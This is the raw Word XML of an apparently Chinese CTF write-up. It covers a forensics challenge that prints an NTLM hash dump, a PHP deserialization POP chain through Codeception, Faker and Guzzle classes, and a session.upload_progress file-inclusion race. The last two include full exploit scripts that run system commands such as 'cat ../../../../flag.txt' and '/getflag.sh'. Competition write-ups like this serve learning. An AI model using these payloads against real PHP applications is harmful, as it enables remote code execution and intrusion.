        <w:t xml:space="preserve">: (i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="62"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="44"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>))
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>
</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="72"/>
        </w:rPr>
        <w:t>(ans)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得到base64转图片得到flag</w:t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3550920" cy="5212080"/>
            <wp:effectExtent l="0" t="0" r="0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>
      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkStart w:id="3" w:name="考古"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="26"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>层层取证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i103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挂载镜像，发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4602480" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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0050" cy="1042035"/>
            <wp:effectExtent l="0" t="0" r="6350" b="952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根据提示用vm进行仿真</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>又发现</w:t>
      </w:r>
      <w:r>
        <w:t>G:\Users\XiaoMing\AppData\Local\Temp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts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下面有流量包，其中一个里面通过U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发送了一个R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，里面有flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="442341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提取后发现有密码，于是继续寻找密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4419600" cy="1962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系统需要登录，于是使用寻找密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>XinSai:1000:aad3b435b51404eeaad3b435b51404ee:27caa41e7118fd4429d9b9cbd87aaa40:::</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>XiaoMing:1001:aad3b435b51404eeaad3b435b51404ee:92efa7f9f2740956d51157f46521f941:::</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:t>XiaoMing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的密码能查到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="19342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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="2313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登录系统获得压缩包密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="28416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解压获得flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1032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rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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EB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i103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rPr>
          <w:rFonts w:hint="default" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ezyii</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1034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  <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>topProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法中存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4351020" cy="320040"/>
            <wp:effectExtent l="0" t="0" r="762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Style w:val="24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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">找到了可利用点，跟进 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rewind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4069080" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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下面断点的地方又可以走向其他类中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rewind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3634740" cy="4937760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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19"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>在这里可以看到很相似的调用。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跟进 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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07280" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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又要跳向其他类的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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023360" cy="3063240"/>
            <wp:effectExtent l="0" t="0" r="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在这里找到了利用的地方。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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716780" cy="1272540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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EXP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?phpnamespace Codeception\Extension{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use Faker\DefaultGenerator;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use GuzzleHttp\Psr7\AppendStream;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class  RunProcess{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protected $output;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private $processes = [];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public function __construct(){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$this-&gt;processes[]=new DefaultGenerator(new AppendStream());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$this-&gt;output=new DefaultGenerator('jiang');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}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}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echo urlencode(serialize(new RunProcess()));}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>namespace Faker{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class DefaultGenerator{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protected $default;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public function __construct($default = null)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$this-&gt;default = $default;}}}namespace GuzzleHttp\Psr7{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use Faker\DefaultGenerator;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final class AppendStream{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private $streams = [];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private $seekable = true;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public function __construct(){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$this-&gt;streams[]=new CachingStream();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}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}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final class CachingStream{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private $remoteStream;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public function __construct(){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$this-&gt;remoteStream=new DefaultGenerator(false);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$this-&gt;stream=new  PumpStream();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}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}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final class PumpStream{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private $source;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private $size=-10;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private $buffer;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public function __construct(){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$this-&gt;buffer=new DefaultGenerator('j');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include("closure/autoload.php");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$a = function(){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system(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cat ../../../../flag.txt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t>};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$a = \Opis\Closure\serialize($a);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$b = unserialize($a);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    $this-&gt;source=$b;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="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Base64编码后得到flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/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4236720" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i103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19"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>安全检测</w:t>
      </w:r>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i103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19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扫描发现admin目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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457700" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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这存在文件读取,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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读取http://127.0.0.1/admin得到</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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663440" cy="2179320"/>
            <wp:effectExtent l="0" t="0" r="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477510" cy="1965325"/>
            <wp:effectExtent l="0" t="0" r="8890" b="63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eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session.upload_progress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漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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9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Exp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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import io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import requests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import threading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sessid = 'aa'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def login():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data1 = '{"username":"1234","password":"1234"}'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resp = requests.post('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7620" b="9525"/>
            <wp:docPr id="39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http://eci-2ze66rxpzrwewxnegoz5.cloudeci1.ichunqiu.com/login.php', data=data1)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def post():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while True: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data2={'url1':'http://127.0.0.1/admin/include123.php?u=/tmp/sess_aa'}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requests.post('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7620" b="9525"/>
            <wp:docPr id="40" name="图片 2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 descr="IMG_25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http://eci-2ze66rxpzrwewxnegoz5.cloudeci1.ichunqiu.com/',data=data2)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def write(session):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while True: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f = io.BytesIO(b'a' * 1024 * 50)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resp = session.post( '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7620" b="9525"/>
            <wp:docPr id="41" name="图片 2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 descr="IMG_2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http://eci-2ze66rxpzrwewxnegoz5.cloudeci1.ichunqiu.com/', data={'PHP_SESSION_UPLOAD_PROGRESS': 'm1h3&lt;?php system("/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7620" b="9525"/>
            <wp:docPr id="42" name="图片 2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 descr="IMG_2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getflag.sh");?&gt;'}, files={'file': ('aa.txt',f)}, cookies={'PHPSESSID': sessid} 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if __name__=="__main__":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login()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post()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event=threading.Event()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with requests.session() as session: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for i in range(1,30):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threading.Thread(target=write,args=(session,)).start()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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得到flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19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9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1955" cy="1258570"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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Theme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN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NotTrackMoves/>
  <w:documentProtection w:enforcement="0"/>
  <w:defaultTabStop w:val="720"/>
  <w:drawingGridHorizontalSpacing w:val="360"/>
  <w:drawingGridVerticalSpacing w:val="360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F21207"/>
    <w:rsid w:val="000F30E0"/>
    <w:rsid w:val="001D5621"/>
    <w:rsid w:val="0027665F"/>
    <w:rsid w:val="00562D7E"/>
    <w:rsid w:val="00564D80"/>
    <w:rsid w:val="009325CA"/>
    <w:rsid w:val="00A50482"/>
    <w:rsid w:val="00A7521E"/>
    <w:rsid w:val="00A97A0F"/>
    <w:rsid w:val="00AF0139"/>
    <w:rsid w:val="00B06E58"/>
    <w:rsid w:val="00E11159"/>
    <w:rsid w:val="00F21207"/>
    <w:rsid w:val="10F64C86"/>
    <w:rsid w:val="20A668E9"/>
    <w:rsid w:val="2C9913AA"/>
    <w:rsid w:val="4CEB5449"/>
    <w:rsid w:val="6DA5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7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link w:val="74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75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spacing w:before="240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paragraph" w:styleId="1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2">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="24">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="21"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="25">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="27">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28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30">
    <w:name w:val="书目1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="3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32">
    <w:name w:val="Definition Term"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="33"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="33">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="36"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="38">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="23"/>
    <w:link w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="TOC 标题1"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="3"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="366091" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="42">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="902000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
